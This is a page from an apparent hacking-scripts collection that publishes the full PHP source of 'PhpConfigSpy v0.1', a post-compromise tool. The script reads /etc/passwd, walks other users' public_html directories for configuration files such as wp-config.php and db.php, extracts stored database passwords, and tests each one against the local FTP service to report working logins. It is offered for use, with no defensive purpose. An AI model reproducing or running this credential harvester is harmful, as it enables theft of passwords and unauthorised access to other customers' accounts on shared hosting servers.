HackingScripts

Hack Scripts for everybody

PhpConfigSpy

10 Feb 2014

This script appears to try to obtain login details for a compromised server.

PhpConfigSpy Source Code

  1 <?php 
  2 echo "<html>"; 
  3 echo "<title>PhpConfigSpy v0.1</title><body>"; 
  4 
  5 set_time_limit(0); 
  6 
  7 ###
  8 ###
  9 ###
 10 ###
 11 ###
 12 ###
 13 ###
 14 ###
 15 ### 
 16 @$passwd=fopen('/etc/passwd','r'); 
 17 if (!$passwd) { 
 18   echo "[-] Error : coudn't read /etc/passwd"; 
 19   exit; 
 20 } 
 21 $path_to_public=array(); 
 22 $users=array(); 
 23 $pathtoconf=array(); 
 24 $i=0; 
 25 
 26 while(!feof($passwd)) { 
 27 $str=fgets($passwd); 
 28 if ($i>35) { 
 29    $pos=strpos($str,":"); 
 30    $username=substr($str,0,$pos); 
 31    $dirz="/home/$username/public_html/"; 
 32    if (($username!="")) { 
 33        if (is_readable($dirz)) { 
 34            array_push($users,$username); 
 35            array_push($path_to_public,$dirz); 
 36        } 
 37    } 
 38 } 
 39 $i++; 
 40 } 
 41 
 42 ###
 43 ###
 44 ###
 45 ###
 46 ###
 47 ###
 48 ###
 49 ###
 50 #### 
 51 
 52 
 53 ###
 54 ###
 55 ###
 56 ###
 57 ###
 58 ###
 59 ###
 60 ###
 61 ###
 62 ###
 63 ###
 64 #### 
 65 echo "<br><br>"; 
 66 echo "<textarea name='main_window' cols=100 rows=20>"; 
 67 
 68 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; 
 69 echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n"; 
 70 
 71 echo "[~] Searching for passwords in config.* files...\n\n"; 
 72 foreach ($users as $user) { 
 73        $path="/home/$user/public_html/"; 
 74        read_dir($path,$user); 
 75 } 
 76 
 77 echo "\n[+] Done\n"; 
 78 
 79 function read_dir($path,$username) { 
 80    if ($handle = opendir($path)) { 
 81        while (false !== ($file = readdir($handle))) { 
 82              $fpath="$path$file"; 
 83              if (($file!='.') and ($file!='..')) { 
 84                 if (is_readable($fpath)) { 
 85                    $dr="$fpath/"; 
 86                    if (is_dir($dr)) { 
 87                       read_dir($dr,$username); 
 88                    } 
 89                    else { 
 90                         if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { 
 91                            $pass=get_pass($fpath); 
 92                            if ($pass!='') { 
 93                               echo "[+] $fpath\n$pass\n"; 
 94                               ftp_check($username,$pass); 
 95                            } 
 96                         } 
 97                    } 
 98                 } 
 99              } 
100        } 
101    } 
102 } 
103 
104 function get_pass($link) { 
105    @$config=fopen($link,'r'); 
106    while(!feof($config)) { 
107        $line=fgets($config); 
108        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { 
109            if (strrpos($line,'"')) 
110               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); 
111            else 
112               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); 
113            return $pass; 
114        } 
115    } 
116 } 
117 
118 function ftp_check($login,$pass) { 
119     @$ftp=ftp_connect('127.0.0.1'); 
120     if ($ftp) { 
121        @$res=ftp_login($ftp,$login,$pass); 
122        if ($res) { 
123           echo '[FTP] '.$login.':'.$pass."  Success\n"; 
124        } 
125        else ftp_quit($ftp); 
126     } 
127 } 
128 
129 echo "</textarea><br>"; 
130 
131 echo "</body></html>"; 
132 ?>